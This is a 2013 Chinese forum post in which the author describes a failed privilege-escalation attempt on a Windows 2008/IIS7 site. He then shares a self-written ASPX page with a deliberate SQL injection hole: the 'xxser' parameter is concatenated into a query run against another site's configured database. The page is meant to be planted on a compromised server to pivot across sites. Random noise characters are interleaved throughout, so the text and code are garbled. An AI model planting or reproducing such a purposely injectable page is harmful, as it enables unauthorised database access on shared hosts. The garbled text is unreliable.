昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
; F4 h1 V9 Y( O1 Z4 o$ W其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。9 [9 m3 T: o0 u! i) T! ^( u
代码量不多,自己写个拉倒了。烦死了。' z( [* a2 N% m; e* @9 }7 f% _
5 W, u4 B+ l5 X9 E# I- H
) C5 n0 H2 T( N5 Q* n0 e) M8 f$ |<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4 ^, e$ C4 S: z7 t9 u" ^& {<html xmlns="http://www.w3.org/1999/xhtml">
@3 N3 F5 [: J+ G0 K3 |: ~! H<head runat="server">
) s' y6 p1 h& v1 }# y <title>暗影aspx构造注射专用页面</title>" F5 p: `0 \4 ?7 e% R9 S
</head> L* z8 S3 ]6 K# g$ t. F
<body>
5 A3 D2 l# x0 c* ]* I2 P <form id="form1" runat="server">) g7 v7 |% M# F, H3 F. w
<div>
& m, t/ b) N3 F; M <script language="c#" runat="server">
/ ^1 }* x+ i$ i ( M2 q4 A! T: K
void page_init(object sender, EventArgs e)
8 j5 f; F9 b! R! _6 T& f. p9 s {
% G+ q* z: S% @$ A/ S) N
$ U2 n t% B) C; Y3 ? System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();$ C" J4 x0 U. P7 |2 _( J4 z( M
2 Q' k0 d) i% u( O* d2 q, F
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
9 F8 G: o, D8 J* }, M" i! o6 ?- f conn.Open();$ `/ Q" ?; m4 ^- H
" ~& [4 w# k$ S8 `+ N string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=12 G1 D% {; @( c& U- O' L
4 h; U$ M+ k* |$ C$ w System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
. a- x( X0 e& o7 g. c& Z$ y int x = command.ExecuteNonQuery();
& V1 C- ]4 c, ]/ q+ c Response.Write(i+"\n");: u% O9 i2 ?; ~/ _
Response.Write(x);
( s. |3 R- o+ d conn.Close();
g# U" J8 N1 u( R }
- V7 r! x6 G, [) ?8 }+ i& @+ m* X$ e" V - _ Y$ C1 E+ I1 v
</script>9 a% d+ P5 k) `$ d
</div>: l5 E1 f4 r/ F* w9 B+ W
</form>
) _4 Q. V/ r- Z3 Z. w</body>
4 ?& K+ X. O. g. X; ?! F</html>
1 A# z0 P5 n5 q |
发表于 2013-3-20 21:32:01
收藏
支持
反对